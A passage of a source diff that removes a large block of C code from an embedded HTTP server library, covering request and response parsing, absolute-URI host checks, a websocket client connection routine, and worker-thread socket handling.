-	for (i = 0; abs_uri_protocols[i].proto != NULL; i++) {
-		if (mg_strncasecmp(uri,
-		                   abs_uri_protocols[i].proto,
-		                   abs_uri_protocols[i].proto_len) == 0) {
-
-			hostbegin = uri + abs_uri_protocols[i].proto_len;
-			hostend = strchr(hostbegin, '/');
-			if (!hostend) {
-				return 0;
-			}
-			portbegin = strchr(hostbegin, ':');
-			if ((!portbegin) || (portbegin > hostend)) {
-				port = abs_uri_protocols[i].default_port;
-				request_domain_len = (size_t)(hostend - hostbegin);
-			} else {
-				port = strtoul(portbegin + 1, &portend, 10);
-				if ((portend != hostend) || (port <= 0)
-				    || !is_valid_port(port)) {
-					return 0;
-				}
-				request_domain_len = (size_t)(portbegin - hostbegin);
-			}
-			/* protocol found, port set */
-			break;
-		}
-	}
-
-	if (!port) {
-		/* port remains 0 if the protocol is not found */
-		return 0;
-	}
-
-/* Check if the request is directed to a different server. */
-/* First check if the port is the same (IPv4 and IPv6). */
-#if defined(USE_IPV6)
-	if (conn->client.lsa.sa.sa_family == AF_INET6) {
-		if (ntohs(conn->client.lsa.sin6.sin6_port) != port) {
-			/* Request is directed to a different port */
-			return 0;
-		}
-	} else
-#endif
-	{
-		if (ntohs(conn->client.lsa.sin.sin_port) != port) {
-			/* Request is directed to a different port */
-			return 0;
-		}
-	}
-
-	/* Finally check if the server corresponds to the authentication
-	 * domain of the server (the server domain).
-	 * Allow full matches (like http://mydomain.com/path/file.ext), and
-	 * allow subdomain matches (like http://www.mydomain.com/path/file.ext),
-	 * but do not allow substrings (like
-	 * http://notmydomain.com/path/file.ext
-	 * or http://mydomain.com.fake/path/file.ext).
-	 */
-	if (auth_domain_check_enabled) {
-		if ((request_domain_len == server_domain_len)
-		    && (!memcmp(server_domain, hostbegin, server_domain_len))) {
-			/* Request is directed to this server - full name match. */
-		} else {
-			if (request_domain_len < (server_domain_len + 2)) {
-				/* Request is directed to another server: The server name is
-				 * longer
-				 * than
-				 * the request name. Drop this case here to avoid overflows
-				 * in
-				 * the
-				 * following checks. */
-				return 0;
-			}
-			if (hostbegin[request_domain_len - server_domain_len - 1] != '.') {
-				/* Request is directed to another server: It could be a
-				 * substring
-				 * like notmyserver.com */
-				return 0;
-			}
-			if (0 != memcmp(server_domain,
-			                hostbegin + request_domain_len - server_domain_len,
-			                server_domain_len)) {
-				/* Request is directed to another server:
-				 * The server name is different. */
-				return 0;
-			}
-		}
-	}
-
-	return hostend;
-}
-
-
-static int
-get_message(struct mg_connection *conn, char *ebuf, size_t ebuf_len, int *err)
-{
-	if (ebuf_len > 0) {
-		ebuf[0] = '\0';
-	}
-	*err = 0;
-
-	reset_per_request_attributes(conn);
-
-	if (!conn) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Internal error");
-		*err = 500;
-		return 0;
-	}
-	/* Set the time the request was received. This value should be used for
-	 * timeouts. */
-	clock_gettime(CLOCK_MONOTONIC, &(conn->req_time));
-
-	conn->request_len =
-	    read_message(NULL, conn, conn->buf, conn->buf_size, &conn->data_len);
-	/* assert(conn->request_len < 0 || conn->data_len >= conn->request_len);
-	 */
-	if ((conn->request_len >= 0) && (conn->data_len < conn->request_len)) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Invalid message size");
-		*err = 500;
-		return 0;
-	}
-
-	if ((conn->request_len == 0) && (conn->data_len == conn->buf_size)) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Message too large");
-		*err = 413;
-		return 0;
-	}
-
-	if (conn->request_len <= 0) {
-		if (conn->data_len > 0) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Malformed message");
-			*err = 400;
-		} else {
-			/* Server did not recv anything -> just close the connection */
-			conn->must_close = 1;
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "No data received");
-			*err = 0;
-		}
-		return 0;
-	}
-	return 1;
-}
-
-
-static int
-get_request(struct mg_connection *conn, char *ebuf, size_t ebuf_len, int *err)
-{
-	const char *cl;
-	if (!get_message(conn, ebuf, ebuf_len, err)) {
-		return 0;
-	}
-
-	if (parse_http_request(conn->buf, conn->buf_size, &conn->request_info)
-	    <= 0) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Bad request");
-		*err = 400;
-		return 0;
-	}
-
-	/* Message is a valid request */
-	if ((cl = get_header(conn->request_info.http_headers,
-	                     conn->request_info.num_headers,
-	                     "Content-Length")) != NULL) {
-		/* Request/response has content length set */
-		char *endptr = NULL;
-		conn->content_len = strtoll(cl, &endptr, 10);
-		if (endptr == cl) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Bad request");
-			*err = 411;
-			return 0;
-		}
-		/* Publish the content length back to the request info. */
-		conn->request_info.content_length = conn->content_len;
-	} else if ((cl = get_header(conn->request_info.http_headers,
-	                            conn->request_info.num_headers,
-	                            "Transfer-Encoding")) != NULL
-	           && !mg_strcasecmp(cl, "chunked")) {
-		conn->is_chunked = 1;
-		conn->content_len = -1; /* unknown content length */
-	} else if (get_http_method_info(conn->request_info.request_method)
-	               ->request_has_body) {
-		/* POST or PUT request without content length set */
-		conn->content_len = -1; /* unknown content length */
-	} else {
-		/* Other request */
-		conn->content_len = 0; /* No content */
-	}
-
-	conn->connection_type = CONNECTION_TYPE_REQUEST; /* Valid request */
-	return 1;
-}
-
-
-/* conn is assumed to be valid in this internal function */
-static int
-get_response(struct mg_connection *conn, char *ebuf, size_t ebuf_len, int *err)
-{
-	const char *cl;
-	if (!get_message(conn, ebuf, ebuf_len, err)) {
-		return 0;
-	}
-
-	if (parse_http_response(conn->buf, conn->buf_size, &conn->response_info)
-	    <= 0) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Bad response");
-		*err = 400;
-		return 0;
-	}
-
-	/* Message is a valid response */
-	if ((cl = get_header(conn->response_info.http_headers,
-	                     conn->response_info.num_headers,
-	                     "Content-Length")) != NULL) {
-		/* Request/response has content length set */
-		char *endptr = NULL;
-		conn->content_len = strtoll(cl, &endptr, 10);
-		if (endptr == cl) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Bad request");
-			*err = 411;
-			return 0;
-		}
-		/* Publish the content length back to the response info. */
-		conn->response_info.content_length = conn->content_len;
-
-		/* TODO: check if it is still used in response_info */
-		conn->request_info.content_length = conn->content_len;
-
-	} else if ((cl = get_header(conn->response_info.http_headers,
-	                            conn->response_info.num_headers,
-	                            "Transfer-Encoding")) != NULL
-	           && !mg_strcasecmp(cl, "chunked")) {
-		conn->is_chunked = 1;
-		conn->content_len = -1; /* unknown content length */
-	} else {
-		conn->content_len = -1; /* unknown content length */
-	}
-
-	conn->connection_type = CONNECTION_TYPE_RESPONSE; /* Valid response */
-	return 1;
-}
-
-
-int
-mg_get_response(struct mg_connection *conn,
-                char *ebuf,
-                size_t ebuf_len,
-                int timeout)
-{
-	int err, ret;
-	char txt[32]; /* will not overflow */
-	struct mg_context *octx;
-	struct mg_context rctx;
-
-	if (ebuf_len > 0) {
-		ebuf[0] = '\0';
-	}
-
-	if (!conn) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Parameter error");
-		return -1;
-	}
-
-	/* Implementation of API function for HTTP clients */
-	octx = conn->ctx;
-	rctx = *(conn->ctx);
-
-	if (timeout >= 0) {
-		mg_snprintf(conn, NULL, txt, sizeof(txt), "%i", timeout);
-		rctx.config[REQUEST_TIMEOUT] = txt;
-		/* Not required for non-blocking sockets.
-		set_sock_timeout(conn->client.sock, timeout);
-		*/
-	} else {
-		rctx.config[REQUEST_TIMEOUT] = NULL;
-	}
-
-	conn->ctx = &rctx;
-	ret = get_response(conn, ebuf, ebuf_len, &err);
-	conn->ctx = octx;
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* TODO: 1) uri is deprecated;
-	 *       2) here, ri.uri is the http response code */
-	conn->request_info.uri = conn->request_info.request_uri;
-#endif
-	conn->request_info.local_uri = conn->request_info.request_uri;
-
-	/* TODO (mid): Define proper return values - maybe return length?
-	 * For the first test use <0 for error and >0 for OK */
-	return (ret == 0) ? -1 : +1;
-}
-
-
-struct mg_connection *
-mg_download(const char *host,
-            int port,
-            int use_ssl,
-            char *ebuf,
-            size_t ebuf_len,
-            const char *fmt,
-            ...)
-{
-	struct mg_connection *conn;
-	va_list ap;
-	int i;
-	int reqerr;
-
-	if (ebuf_len > 0) {
-		ebuf[0] = '\0';
-	}
-
-	va_start(ap, fmt);
-
-	/* open a connection */
-	conn = mg_connect_client(host, port, use_ssl, ebuf, ebuf_len);
-
-	if (conn != NULL) {
-		i = mg_vprintf(conn, fmt, ap);
-		if (i <= 0) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Error sending request");
-		} else {
-			get_response(conn, ebuf, ebuf_len, &reqerr);
-
-#if defined(MG_LEGACY_INTERFACE)
-			/* TODO: 1) uri is deprecated;
-			 *       2) here, ri.uri is the http response code */
-			conn->request_info.uri = conn->request_info.request_uri;
-#endif
-			conn->request_info.local_uri = conn->request_info.request_uri;
-		}
-	}
-
-	/* if an error occured, close the connection */
-	if ((ebuf[0] != '\0') && (conn != NULL)) {
-		mg_close_connection(conn);
-		conn = NULL;
-	}
-
-	va_end(ap);
-	return conn;
-}
-
-
-struct websocket_client_thread_data {
-	struct mg_connection *conn;
-	mg_websocket_data_handler data_handler;
-	mg_websocket_close_handler close_handler;
-	void *callback_data;
-};
-
-
-#if defined(USE_WEBSOCKET)
-#ifdef _WIN32
-static unsigned __stdcall websocket_client_thread(void *data)
-#else
-static void *
-websocket_client_thread(void *data)
-#endif
-{
-	struct websocket_client_thread_data *cdata =
-	    (struct websocket_client_thread_data *)data;
-
-	mg_set_thread_name("ws-clnt");
-
-	if (cdata->conn->ctx) {
-		if (cdata->conn->ctx->callbacks.init_thread) {
-			/* 3 indicates a websocket client thread */
-			/* TODO: check if conn->ctx can be set */
-			cdata->conn->ctx->callbacks.init_thread(cdata->conn->ctx, 3);
-		}
-	}
-
-	read_websocket(cdata->conn, cdata->data_handler, cdata->callback_data);
-
-	DEBUG_TRACE("%s", "Websocket client thread exited\n");
-
-	if (cdata->close_handler != NULL) {
-		cdata->close_handler(cdata->conn, cdata->callback_data);
-	}
-
-	/* The websocket_client context has only this thread. If it runs out,
-	   set the stop_flag to 2 (= "stopped"). */
-	cdata->conn->ctx->stop_flag = 2;
-
-	mg_free((void *)cdata);
-
-#ifdef _WIN32
-	return 0;
-#else
-	return NULL;
-#endif
-}
-#endif
-
-
-struct mg_connection *
-mg_connect_websocket_client(const char *host,
-                            int port,
-                            int use_ssl,
-                            char *error_buffer,
-                            size_t error_buffer_size,
-                            const char *path,
-                            const char *origin,
-                            mg_websocket_data_handler data_func,
-                            mg_websocket_close_handler close_func,
-                            void *user_data)
-{
-	struct mg_connection *conn = NULL;
-
-#if defined(USE_WEBSOCKET)
-	struct mg_context *newctx = NULL;
-	struct websocket_client_thread_data *thread_data;
-	static const char *magic = "x3JJHMbDL1EzLkh9GBhXDw==";
-	static const char *handshake_req;
-
-	if (origin != NULL) {
-		handshake_req = "GET %s HTTP/1.1\r\n"
-		                "Host: %s\r\n"
-		                "Upgrade: websocket\r\n"
-		                "Connection: Upgrade\r\n"
-		                "Sec-WebSocket-Key: %s\r\n"
-		                "Sec-WebSocket-Version: 13\r\n"
-		                "Origin: %s\r\n"
-		                "\r\n";
-	} else {
-		handshake_req = "GET %s HTTP/1.1\r\n"
-		                "Host: %s\r\n"
-		                "Upgrade: websocket\r\n"
-		                "Connection: Upgrade\r\n"
-		                "Sec-WebSocket-Key: %s\r\n"
-		                "Sec-WebSocket-Version: 13\r\n"
-		                "\r\n";
-	}
-
-	/* Establish the client connection and request upgrade */
-	conn = mg_download(host,
-	                   port,
-	                   use_ssl,
-	                   error_buffer,
-	                   error_buffer_size,
-	                   handshake_req,
-	                   path,
-	                   host,
-	                   magic,
-	                   origin);
-
-	/* Connection object will be null if something goes wrong */
-	if (conn == NULL) {
-		if (!*error_buffer) {
-			/* There should be already an error message */
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            error_buffer,
-			            error_buffer_size,
-			            "Unexpected error");
-		}
-		return NULL;
-	}
-
-	if (conn->response_info.status_code != 101) {
-		/* We sent an "upgrade" request. For a correct websocket
-		 * protocol handshake, we expect a "101 Continue" response.
-		 * Otherwise it is a protocol violation. Maybe the HTTP
-		 * Server does not know websockets. */
-		if (!*error_buffer) {
-			/* set an error, if not yet set */
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            error_buffer,
-			            error_buffer_size,
-			            "Unexpected server reply");
-		}
-
-		DEBUG_TRACE("Websocket client connect error: %s\r\n", error_buffer);
-		mg_free(conn);
-		return NULL;
-	}
-
-	/* For client connections, mg_context is fake. Since we need to set a
-	 * callback function, we need to create a copy and modify it. */
-	newctx = (struct mg_context *)mg_malloc(sizeof(struct mg_context));
-	memcpy(newctx, conn->ctx, sizeof(struct mg_context));
-	newctx->user_data = user_data;
-	newctx->context_type = CONTEXT_WS_CLIENT; /* ws/wss client context */
-	newctx->cfg_worker_threads = 1; /* one worker thread will be created */
-	newctx->worker_threadids =
-	    (pthread_t *)mg_calloc_ctx(newctx->cfg_worker_threads,
-	                               sizeof(pthread_t),
-	                               newctx);
-	conn->ctx = newctx;
-	thread_data = (struct websocket_client_thread_data *)
-	    mg_calloc_ctx(sizeof(struct websocket_client_thread_data), 1, newctx);
-	thread_data->conn = conn;
-	thread_data->data_handler = data_func;
-	thread_data->close_handler = close_func;
-	thread_data->callback_data = user_data;
-
-	/* Start a thread to read the websocket client connection
-	 * This thread will automatically stop when mg_disconnect is
-	 * called on the client connection */
-	if (mg_start_thread_with_id(websocket_client_thread,
-	                            (void *)thread_data,
-	                            newctx->worker_threadids) != 0) {
-		mg_free((void *)thread_data);
-		mg_free((void *)newctx->worker_threadids);
-		mg_free((void *)newctx);
-		mg_free((void *)conn);
-		conn = NULL;
-		DEBUG_TRACE("%s",
-		            "Websocket client connect thread could not be started\r\n");
-	}
-
-#else
-	/* Appease "unused parameter" warnings */
-	(void)host;
-	(void)port;
-	(void)use_ssl;
-	(void)error_buffer;
-	(void)error_buffer_size;
-	(void)path;
-	(void)origin;
-	(void)user_data;
-	(void)data_func;
-	(void)close_func;
-#endif
-
-	return conn;
-}
-
-
-/* Prepare connection data structure */
-static void
-init_connection(struct mg_connection *conn)
-{
-	/* Is keep alive allowed by the server */
-	int keep_alive_enabled =
-	    !mg_strcasecmp(conn->ctx->config[ENABLE_KEEP_ALIVE], "yes");
-
-	if (!keep_alive_enabled) {
-		conn->must_close = 1;
-	}
-
-	/* Important: on new connection, reset the receiving buffer. Credit
-	 * goes to crule42. */
-	conn->data_len = 0;
-	conn->handled_requests = 0;
-	mg_set_user_connection_data(conn, NULL);
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 2; /* init */
-#endif
-
-	/* call the init_connection callback if assigned */
-	if (conn->ctx->callbacks.init_connection != NULL) {
-		if (conn->ctx->context_type == CONTEXT_SERVER) {
-			void *conn_data = NULL;
-			conn->ctx->callbacks.init_connection(conn, &conn_data);
-			mg_set_user_connection_data(conn, conn_data);
-		}
-	}
-}
-
-
-/* Process a connection - may handle multiple requests
- * using the same connection.
- * Must be called with a valid connection (conn  and
- * conn->ctx must be valid).
- */
-static void
-process_new_connection(struct mg_connection *conn)
-{
-	struct mg_request_info *ri = &conn->request_info;
-	int keep_alive, discard_len;
-	char ebuf[100];
-	const char *hostend;
-	int reqerr, uri_type;
-
-#if defined(USE_SERVER_STATS)
-	int mcon = mg_atomic_inc(&(conn->ctx->active_connections));
-	mg_atomic_add(&(conn->ctx->total_connections), 1);
-	if (mcon > (conn->ctx->max_connections)) {
-		/* could use atomic compare exchange, but this
-		 * seems overkill for statistics data */
-		conn->ctx->max_connections = mcon;
-	}
-#endif
-
-	init_connection(conn);
-
-	DEBUG_TRACE("Start processing connection from %s",
-	            conn->request_info.remote_addr);
-
-	/* Loop over multiple requests sent using the same connection
-	 * (while "keep alive"). */
-	do {
-
-		DEBUG_TRACE("calling get_request (%i times for this connection)",
-		            conn->handled_requests + 1);
-
-#if defined(USE_SERVER_STATS)
-		conn->conn_state = 3; /* ready */
-#endif
-
-		if (!get_request(conn, ebuf, sizeof(ebuf), &reqerr)) {
-			/* The request sent by the client could not be understood by
-			 * the server, or it was incomplete or a timeout. Send an
-			 * error message and close the connection. */
-			if (reqerr > 0) {
-				/*assert(ebuf[0] != '\0');*/
-				mg_send_http_error(conn, reqerr, "%s", ebuf);
-			}
-		} else if (strcmp(ri->http_version, "1.0")
-		           && strcmp(ri->http_version, "1.1")) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            sizeof(ebuf),
-			            "Bad HTTP version: [%s]",
-			            ri->http_version);
-			mg_send_http_error(conn, 505, "%s", ebuf);
-		}
-
-		if (ebuf[0] == '\0') {
-			uri_type = get_uri_type(conn->request_info.request_uri);
-			switch (uri_type) {
-			case 1:
-				/* Asterisk */
-				conn->request_info.local_uri = NULL;
-				break;
-			case 2:
-				/* relative uri */
-				conn->request_info.local_uri = conn->request_info.request_uri;
-				break;
-			case 3:
-			case 4:
-				/* absolute uri (with/without port) */
-				hostend = get_rel_url_at_current_server(
-				    conn->request_info.request_uri, conn);
-				if (hostend) {
-					conn->request_info.local_uri = hostend;
-				} else {
-					conn->request_info.local_uri = NULL;
-				}
-				break;
-			default:
-				mg_snprintf(conn,
-				            NULL, /* No truncation check for ebuf */
-				            ebuf,
-				            sizeof(ebuf),
-				            "Invalid URI");
-				mg_send_http_error(conn, 400, "%s", ebuf);
-				conn->request_info.local_uri = NULL;
-				break;
-			}
-
-#if defined(MG_LEGACY_INTERFACE)
-			/* Legacy before split into local_uri and request_uri */
-			conn->request_info.uri = conn->request_info.local_uri;
-#endif
-		}
-
-		DEBUG_TRACE("http: %s, error: %s",
-		            (ri->http_version ? ri->http_version : "none"),
-		            (ebuf[0] ? ebuf : "none"));
-
-		if (ebuf[0] == '\0') {
-			if (conn->request_info.local_uri) {
-
-/* handle request to local server */
-#if defined(USE_SERVER_STATS)
-				conn->conn_state = 4; /* processing */
-#endif
-				handle_request(conn);
-
-#if defined(USE_SERVER_STATS)
-				conn->conn_state = 5; /* processed */
-
-				mg_atomic_add(&(conn->ctx->total_data_read),
-				              conn->consumed_content);
-				mg_atomic_add(&(conn->ctx->total_data_written),
-				              conn->num_bytes_sent);
-#endif
-
-				DEBUG_TRACE("%s", "handle_request done");
-
-				if (conn->ctx->callbacks.end_request != NULL) {
-					conn->ctx->callbacks.end_request(conn, conn->status_code);
-					DEBUG_TRACE("%s", "end_request callback done");
-				}
-				log_access(conn);
-			} else {
-				/* TODO: handle non-local request (PROXY) */
-				conn->must_close = 1;
-			}
-		} else {
-			conn->must_close = 1;
-		}
-
-		if (ri->remote_user != NULL) {
-			mg_free((void *)ri->remote_user);
-			/* Important! When having connections with and without auth
-			 * would cause double free and then crash */
-			ri->remote_user = NULL;
-		}
-
-		/* NOTE(lsm): order is important here. should_keep_alive() call
-		 * is using parsed request, which will be invalid after
-		 * memmove's below.
-		 * Therefore, memorize should_keep_alive() result now for later
-		 * use in loop exit condition. */
-		keep_alive = (conn->ctx->stop_flag == 0) && should_keep_alive(conn)
-		             && (conn->content_len >= 0);
-
-
-		/* Discard all buffered data for this request */
-		discard_len = ((conn->content_len >= 0) && (conn->request_len > 0)
-		               && ((conn->request_len + conn->content_len)
-		                   < (int64_t)conn->data_len))
-		                  ? (int)(conn->request_len + conn->content_len)
-		                  : conn->data_len;
-		/*assert(discard_len >= 0);*/
-		if (discard_len < 0) {
-			DEBUG_TRACE("internal error: discard_len = %li",
-			            (long int)discard_len);
-			break;
-		}
-		conn->data_len -= discard_len;
-		if (conn->data_len > 0) {
-			DEBUG_TRACE("discard_len = %lu", (long unsigned)discard_len);
-			memmove(conn->buf, conn->buf + discard_len, (size_t)conn->data_len);
-		}
-
-		/* assert(conn->data_len >= 0); */
-		/* assert(conn->data_len <= conn->buf_size); */
-
-		if ((conn->data_len < 0) || (conn->data_len > conn->buf_size)) {
-			DEBUG_TRACE("internal error: data_len = %li, buf_size = %li",
-			            (long int)conn->data_len,
-			            (long int)conn->buf_size);
-			break;
-		}
-
-		conn->handled_requests++;
-
-	} while (keep_alive);
-
-	DEBUG_TRACE("Done processing connection from %s (%f sec)",
-	            conn->request_info.remote_addr,
-	            difftime(time(NULL), conn->conn_birth_time));
-
-	close_connection(conn);
-
-#if defined(USE_SERVER_STATS)
-	mg_atomic_add(&(conn->ctx->total_requests), conn->handled_requests);
-	mg_atomic_dec(&(conn->ctx->active_connections));
-#endif
-}
-
-
-#if defined(ALTERNATIVE_QUEUE)
-
-static void
-produce_socket(struct mg_context *ctx, const struct socket *sp)
-{
-	unsigned int i;
-
-	for (;;) {
-		for (i = 0; i < ctx->cfg_worker_threads; i++) {
-			/* find a free worker slot and signal it */
-			if (ctx->client_socks[i].in_use == 0) {
-				ctx->client_socks[i] = *sp;
-				ctx->client_socks[i].in_use = 1;
-				event_signal(ctx->client_wait_events[i]);
-				return;
-			}
-		}
-		/* queue is full */
-		mg_sleep(1);
-	}
-}
-
-
-static int
-consume_socket(struct mg_context *ctx, struct socket *sp, int thread_index)
-{
-	DEBUG_TRACE("%s", "going idle");
-	ctx->client_socks[thread_index].in_use = 0;
-	event_wait(ctx->client_wait_events[thread_index]);
-	*sp = ctx->client_socks[thread_index];
-	DEBUG_TRACE("grabbed socket %d, going busy", sp ? sp->sock : -1);
-
-	return !ctx->stop_flag;
-}
-
-#else /* ALTERNATIVE_QUEUE */
-
-/* Worker threads take accepted socket from the queue */
-static int
-consume_socket(struct mg_context *ctx, struct socket *sp, int thread_index)
-{
-#define QUEUE_SIZE(ctx) ((int)(ARRAY_SIZE(ctx->queue)))
-
-	(void)thread_index;
-
-	(void)pthread_mutex_lock(&ctx->thread_mutex);
-	DEBUG_TRACE("%s", "going idle");
-
-	/* If the queue is empty, wait. We're idle at this point. */
-	while ((ctx->sq_head == ctx->sq_tail) && (ctx->stop_flag == 0)) {
-		pthread_cond_wait(&ctx->sq_full, &ctx->thread_mutex);
-	}
-
-	/* If we're stopping, sq_head may be equal to sq_tail. */
-	if (ctx->sq_head > ctx->sq_tail) {
-		/* Copy socket from the queue and increment tail */
-		*sp = ctx->queue[ctx->sq_tail % QUEUE_SIZE(ctx)];
-		ctx->sq_tail++;
-
-		DEBUG_TRACE("grabbed socket %d, going busy", sp ? sp->sock : -1);
-
-		/* Wrap pointers if needed */
-		while (ctx->sq_tail > QUEUE_SIZE(ctx)) {
-			ctx->sq_tail -= QUEUE_SIZE(ctx);
-			ctx->sq_head -= QUEUE_SIZE(ctx);
-		}
-	}
-
-	(void)pthread_cond_signal(&ctx->sq_empty);
-	(void)pthread_mutex_unlock(&ctx->thread_mutex);
-
-	return !ctx->stop_flag;
-#undef QUEUE_SIZE
-}
-
-
-/* Master thread adds accepted socket to a queue */
-static void
-produce_socket(struct mg_context *ctx, const struct socket *sp)
-{
-#define QUEUE_SIZE(ctx) ((int)(ARRAY_SIZE(ctx->queue)))
-	if (!ctx) {
-		return;
-	}
-	(void)pthread_mutex_lock(&ctx->thread_mutex);
-
-	/* If the queue is full, wait */
-	while ((ctx->stop_flag == 0)
-	       && (ctx->sq_head - ctx->sq_tail >= QUEUE_SIZE(ctx))) {
-		(void)pthread_cond_wait(&ctx->sq_empty, &ctx->thread_mutex);
-	}
-
-	if (ctx->sq_head - ctx->sq_tail < QUEUE_SIZE(ctx)) {
-		/* Copy socket to the queue and increment head */
-		ctx->queue[ctx->sq_head % QUEUE_SIZE(ctx)] = *sp;
-		ctx->sq_head++;
-		DEBUG_TRACE("queued socket %d", sp ? sp->sock : -1);
-	}
-
-	(void)pthread_cond_signal(&ctx->sq_full);
-	(void)pthread_mutex_unlock(&ctx->thread_mutex);
-#undef QUEUE_SIZE
-}
-#endif /* ALTERNATIVE_QUEUE */
-
-
-struct worker_thread_args {
-	struct mg_context *ctx;
-	int index;
-};
-
-
-static void *
-worker_thread_run(struct worker_thread_args *thread_args)
-{
-	struct mg_context *ctx = thread_args->ctx;
-	struct mg_connection *conn;
-	struct mg_workerTLS tls;
-#if defined(MG_LEGACY_INTERFACE)
-	uint32_t addr;
-#endif
-
-	mg_set_thread_name("worker");
-
-	tls.is_master = 0;
-	tls.thread_idx = (unsigned)mg_atomic_inc(&thread_idx_max);
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	tls.pthread_cond_helper_mutex = CreateEvent(NULL, FALSE, FALSE, NULL);
-#endif
-
-	/* Initialize thread local storage before calling any callback */
-	pthread_setspecific(sTlsKey, &tls);
-
-	if (ctx->callbacks.init_thread) {
-		/* call init_thread for a worker thread (type 1) */
-		ctx->callbacks.init_thread(ctx, 1);
-	}
-
-	/* Connection structure has been pre-allocated */
-	if (((int)thread_args->index < 0)
-	    || ((unsigned)thread_args->index
-	        >= (unsigned)ctx->cfg_worker_threads)) {
-		mg_cry(fc(ctx),
-		       "Internal error: Invalid worker index %i",
-		       (int)thread_args->index);
-		return NULL;
-	}
-	conn = ctx->worker_connections + thread_args->index;
-
-	/* Request buffers are not pre-allocated. They are private to the
-	 * request and do not contain any state information that might be
-	 * of interest to anyone observing a server status.  */
-	conn->buf = (char *)mg_malloc_ctx(ctx->max_request_size, conn->ctx);
-	if (conn->buf == NULL) {
-		mg_cry(fc(ctx),
-		       "Out of memory: Cannot allocate buffer for worker %i",
-		       (int)thread_args->index);
-		return NULL;
-	}
-	conn->buf_size = (int)ctx->max_request_size;
-
-	conn->ctx = ctx;
-	conn->thread_index = thread_args->index;
-	conn->request_info.user_data = ctx->user_data;
-	/* Allocate a mutex for this connection to allow communication both
-	 * within the request handler and from elsewhere in the application
-	 */
-	(void)pthread_mutex_init(&conn->mutex, &pthread_mutex_attr);
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 1; /* not consumed */
-#endif
-
-	/* Call consume_socket() even when ctx->stop_flag > 0, to let it
-	 * signal sq_empty condvar to wake up the master waiting in
-	 * produce_socket() */
-	while (consume_socket(ctx, &conn->client, conn->thread_index)) {
-		conn->conn_birth_time = time(NULL);
-
-/* Fill in IP, port info early so even if SSL setup below fails,
- * error handler would have the corresponding info.
- * Thanks to Johannes Winkelmann for the patch.
- */
-#if defined(USE_IPV6)
-		if (conn->client.rsa.sa.sa_family == AF_INET6) {
-			conn->request_info.remote_port =
-			    ntohs(conn->client.rsa.sin6.sin6_port);
-		} else
-#endif
-		{
-			conn->request_info.remote_port =
-			    ntohs(conn->client.rsa.sin.sin_port);
-		}
-
-		sockaddr_to_string(conn->request_info.remote_addr,
-		                   sizeof(conn->request_info.remote_addr),
-		                   &conn->client.rsa);
-
-		DEBUG_TRACE("Start processing connection from %s",
-		            conn->request_info.remote_addr);
-
-#if defined(MG_LEGACY_INTERFACE)
-		/* This legacy interface only works for the IPv4 case */
-		addr = ntohl(conn->client.rsa.sin.sin_addr.s_addr);
-		memcpy(&conn->request_info.remote_ip, &addr, 4);
-#endif
-
-		conn->request_info.is_ssl = conn->client.is_ssl;
-
-		if (conn->client.is_ssl) {
-#ifndef NO_SSL
-			/* HTTPS connection */
-			if (sslize(conn,
-			           conn->ctx->ssl_ctx,
-			           SSL_accept,
-			           &(conn->ctx->stop_flag))) {
-				/* Get SSL client certificate information (if set) */
-				ssl_get_client_cert_info(conn);
-
-				/* process HTTPS connection */
-				process_new_connection(conn);
-
-				/* Free client certificate info */
-				if (conn->request_info.client_cert) {
-					mg_free((void *)(conn->request_info.client_cert->subject));
-					mg_free((void *)(conn->request_info.client_cert->issuer));
-					mg_free((void *)(conn->request_info.client_cert->serial));
-					mg_free((void *)(conn->request_info.client_cert->finger));
-					conn->request_info.client_cert->subject = 0;
-					conn->request_info.client_cert->issuer = 0;
-					conn->request_info.client_cert->serial = 0;
-					conn->request_info.client_cert->finger = 0;
-					mg_free(conn->request_info.client_cert);
-					conn->request_info.client_cert = 0;
-				}
-			} else {
-        /* make sure the connection is cleaned up on SSL failure */
-        close_connection(conn);
-      }
-#endif
-    } else {
-      /* process HTTP connection */
-			process_new_connection(conn);
-		}
-
-		DEBUG_TRACE("%s", "Connection closed");
-	}
-
-
-	pthread_setspecific(sTlsKey, NULL);
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	CloseHandle(tls.pthread_cond_helper_mutex);
-#endif
-	pthread_mutex_destroy(&conn->mutex);
-
-	/* Free the request buffer. */
-	conn->buf_size = 0;
-	mg_free(conn->buf);
-	conn->buf = NULL;
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 9; /* done */
-#endif
-
-	DEBUG_TRACE("%s", "exiting");
-	return NULL;
-}
-
-
-/* Threads have different return types on Windows and Unix. */
-#ifdef _WIN32
-static unsigned __stdcall worker_thread(void *thread_func_param)
-{
-	struct worker_thread_args *pwta =
-	    (struct worker_thread_args *)thread_func_param;
